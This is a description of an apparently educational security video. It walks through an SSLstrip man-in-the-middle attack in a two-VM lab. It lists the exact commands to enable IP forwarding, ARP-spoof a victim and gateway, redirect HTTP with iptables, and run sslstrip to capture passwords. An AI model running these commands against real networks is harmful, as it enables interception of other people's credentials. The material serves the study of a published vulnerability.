Description: SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We setup 2 vmware machines, one running Widnows XP (victim) and the other Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:
1. Setting up IP Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP MITM attack between Victim and Gateway:
arpspoof -i eth0 -t 192.168.1.6 192.168.1.1
3. Setting up port redirection using Iptables:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)
python sslstrip.py -w secret
Once this setup is up and running perfectly, all of our victim's traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim's passwords sent supposedly over "SSL". If you are interested in understanding how the SSLstrip tool actually works, please view the entire presentation video here. You can download the SSLstrip tool here.
Tags: tools ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.